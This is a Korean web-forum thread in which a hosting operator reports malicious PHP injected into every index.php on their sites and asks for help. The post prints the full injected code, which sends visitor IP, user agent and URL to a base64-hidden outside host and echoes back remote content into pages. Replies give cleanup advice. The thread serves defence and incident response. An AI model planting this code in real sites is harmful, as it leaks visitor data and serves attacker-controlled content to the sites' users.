여러분 웹사이트 문제없나요??? 저만의 문제가 아니네요. > 자유게시판

자유게시판

여러분 웹사이트 문제없나요??? 저만의 문제가 아니네요. 정보

여러분 웹사이트 문제없나요??? 저만의 문제가 아니네요.

본문

황당 시츄에이션... 자꾸 (!isset($sRetry)) .... 이상한 코드가 index.php 모든파일에...

저만의 문제가 아닙니다...
(!isset($sRetry))  <-- 좌측 검색어로 네이버 다음 구글등에서 검색해 보니 여기저기서 많은 사례가 발생하고 있습니다.
그누보드 G4s 베타버전도 똑같은 증상이네요.
제가 카페호스팅 몇개 운영하고 있는데 대부분 감염이 되고 지우기를 반복하고 있습니다.

증상은 사이트내의 모든 index.php파일의 첫번때 만나는 ?> 뒤로 붙습니다.

심지어는 head.php나 다용도를 사용하는 page.php파일에도 감염이 됩니다.
제가 필리핀에 있어서 해외에서 사용함으로 열어놔서 그러나 생각도 해보고 텔넷을 ON으로 해서 그런가...
여러모로 찾고 있지만 아직 확실한 결론을 못내리고 있습니다.
시원한 답을 주실분.... 소주한잔 살게요

아래에 있는 문제의 코드
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>
추천
0

댓글 6개

호스팅 비밀번호와 mysql 비밀번호 그리고 관리자 비밀번호를 모두변경하고 모든소스를 검색하여 제거하세요
악성코드임으로 하나라도 남아 있으면 다시 감염됩니다.
친구넷님 감사합니다. ^^ 이래저래 잔머리 굴려서 피해가고는 있는데요.
카페24호스팅 차원에서의 문제는 아니겠지요?
모든 php 화일을 읽기전용으로 권한을 설정해보세요
그리고
common.php 적당한 곳에 $sRetry =1; 이걸 넣어두면 저 코드는 실행되지않겠군요
텔넷 보다는 ssh 이용하시고 변조된 파일 다 찾아서 복구하시고 계정비번 사이트 비번등 모두 바꾸셔야합니다.
사실 백업받아서 복구하고 새로운 계정에 올리는게 안전하긴 합니다만....
사시미리님 감사합니다. 외국사이트 검색해 보면 호스팅 차원의 문제인것 같기도 한데요... 아직은 종잡을 수가 없네요.
전체 196,492 |RSS
자유게시판 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1402호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT